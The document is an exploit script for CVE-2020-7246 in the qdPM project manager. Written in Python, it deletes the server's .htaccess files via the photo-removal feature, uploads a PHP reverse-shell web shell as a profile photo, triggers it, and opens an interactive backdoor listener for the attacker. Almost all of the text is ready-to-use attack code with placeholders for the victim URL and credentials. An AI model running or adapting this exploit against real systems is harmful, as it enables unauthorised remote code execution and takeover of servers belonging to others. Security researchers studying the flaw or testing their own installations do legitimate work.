qdPM Remote Code Execution

`#!/usr/bin/python  
  
#-------------------------------------------------------------------------------------  
# Title: qdPM Webshell Upload + RCE Exploit (qdPMv9.1 and below) (CVE-2020-7246)  
# Author: Tobin Shields (@TobinShields)  
#  
# Description: This is an exploit to automatically upload a PHP web shell to  
# the qdPM platform via the "upload a profile photo" feature.  
# This method also bypasses the fix put into place from a previous CVE  
#  
# Usage: In order to leverage this exploit, you must know the credentials of  
# at least one user. Then, you should modify the values highlighted below.  
# You will also need a .php web shell payload to upload. This exploit  
# was built and tested using the PHP script built by pentestmonkey:  
# https://github.com/pentestmonkey/php-reverse-shell  
#-------------------------------------------------------------------------------------  
  
# Imports  
from requests import Session  
from bs4 import BeautifulSoup as bs  
import socket  
from multiprocessing import Process  
import time  
  
# CHANGE THESE VALUES-----------------------------------------------------------------  
login_url = "http://[victim_domain]/path/to/qdPM/index.php/login"  
username = "[email protected]"  
password = "Pa$$w0rd"  
payload = "/path/to/payload.php"  
listner_port = 1234 # This should match your PHP payload  
connection_delay = 2 # Increase this value if you have a slow connection and are experiencing issues  
# ------------------------------------------------------------------------------------  
  
# Build the myAccout URL from the provided URL  
myAccount_url = login_url.replace("login", "myAccount")  
  
# PROGRAM FUNCTIONS -----------------------------------------------------------------  
# Utility function for anytime a page needs to be requested and parsed via bs4  
def requestAndSoupify(url):  
page = s.get(url)  
soup = bs(page.content, "html.parser")  
return soup  
  
# Function to log into the application, and supply the correct username/password  
def login(url):  
# Soupify the login page  
login_page = requestAndSoupify(url)  
# Grab the csrf token  
token = login_page.find("input", {"name": "login[_csrf_token]"})["value"]  
# Build the POST values  
login_data = {  
"login[email]": username,  
"login[password]": password,  
"login[_csrf_token]": token  
}  
# Send the login request  
s.post(login_url, login_data)  
  
# Function to get the base values for making a POST request from the myAccount page  
def getPOSTValues():  
myAccount_soup = requestAndSoupify(myAccount_url)  
# Search for the 'base' POST data needed for any requests  
u_id = myAccount_soup.find("input", {"name": "users[id]"})["value"]  
token = myAccount_soup.find("input", {"name": "users[_csrf_token]"})["value"]  
u_name = myAccount_soup.find("input", {"name": "users[name]"})["value"]  
u_email = myAccount_soup.find("input", {"name": "users[email]"})["value"]  
# Populate the POST data object  
post_data = {  
"users[id]": u_id,  
"users[_csrf_token]": token,  
"users[name]": u_name,  
"users[email]": u_email,  
"users[culture]": "en" # Keep the language English--change this for your victim locale  
}  
return post_data  
  
# Function to remove the a file from the server by exploiting the CVE  
def removeFile(file_to_remove):  
# Get base POST data  
post_data = getPOSTValues()  
# Add the POST data to remove a file  
post_data["users[photo_preview]"] = file_to_remove  
post_data["users[remove_photo]"] = 1  
# Send the POST request to the /update page  
s.post(myAccount_url + "/update", post_data)  
# Print update to user  
print("Removing " + file_to_remove)  
# Sleep to account for slow connections  
time.sleep(connection_delay)  
  
# Function to upload the payload to the server  
def uploadPayload(payload):  
# Get payload name from supplied URI  
payload_name = payload.rsplit('/', 1)[1]  
# Request page and get base POST files  
post_data = getPOSTValues()  
# Build correct payload POST header by dumping the contents  
payload_file = {"users[photo]": open(payload, 'rb')}  
# Send POST request with base data + file  
s.post(myAccount_url + "/update", post_data, files=payload_file)  
# Print update to user  
print("Uploading " + payload_name)  
# Sleep for slow connections  
time.sleep(connection_delay)  
  
# A Function to find the name of the newly uploaded payload  
# NOTE: We have to do this because qdPM adds a random number to the uploaded file  
# EX: webshell.php becomes 1584009-webshell.php  
def getPayloadURL():  
myAccount_soup = requestAndSoupify(myAccount_url)  
payloadURL = myAccount_soup.find("img", {"class": "user-photo"})["src"]  
return payloadURL  
  
# Function to handle creating the webshell listener and issue commands to the victim  
def createBackdoorListener():  
# Set up the listening socket on localhost  
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
host = "0.0.0.0"  
port = listner_port # Specified at the start of this script by user  
server_socket.bind((host, port))  
server_socket.listen(2)  
victim, address = server_socket.accept()  
# Print update to user once the connection is made  
print("Received connection from: " + str(address))  
  
# Simulate a terminal and build a pusdo-prompt using the victem IP  
prompt = "backdoor@" + str(address[0]) + ":~$ "  
  
# Grab the first response from the victim--this is usually OS info  
response = victim.recv(1024).decode('utf-8')  
print(response)  
print("\nType 'exit' at any time to close the connection")  
  
# Maintain the connection and send data back and forth  
while True:  
# Grab the command from the user  
command = input(prompt)  
# If they type "exit" then close the socket  
if 'exit' in command:  
victim.close()  
server_socket.close()  
print("Disconnecting, please wait...")  
break  
# For all other commands provided  
else:  
# Encode the command to be properly sent via the socket & send the command  
command = str.encode(command + "\n")  
victim.send(command)  
# Grab the response to the command and decode it  
response = victim.recv(1024).decode('utf-8')  
# For some odd reason you have to hit "enter" after sending the command to receive the output  
# TODO: Fix this so it works on a single send? Although it might just be the PHP webshell  
victim.send(str.encode("\n"))  
response = victim.recv(1024).decode('utf-8')  
# If a command returns nothing (i.e. a 'cd' command, it prints a "$"  
# This is a confusing output so it will omit this output  
if response.strip() != "$":  
print(response)  
  
# Trigger the PHP to run by making a page request  
def triggerShell(s, payloadURL):  
pageReq = s.get(payloadURL)  
  
# MAIN FUNCTION ----------------------------------------------------------------------  
# The main function of this program establishes a unique session to issue the various POST requests  
with Session() as s:  
# Login as know user  
login(login_url)  
# Remove Files  
# You may need to modify this list if you suspect that there are more .htaccess files  
# However, the default qdPM installation just had these two  
files_to_remove = [".htaccess", "../.htaccess"]  
for f in files_to_remove:  
removeFile(f)  
# Upload payload  
uploadPayload(payload)  
# Get the payload URL  
payloadURL = getPayloadURL()  
# Start a thread to trigger the script with a web request  
process = Process(target=triggerShell, args=(s, payloadURL))  
process.start()  
# Create the backdoor listener and wait for the above request to trigger  
createBackdoorListener()  
`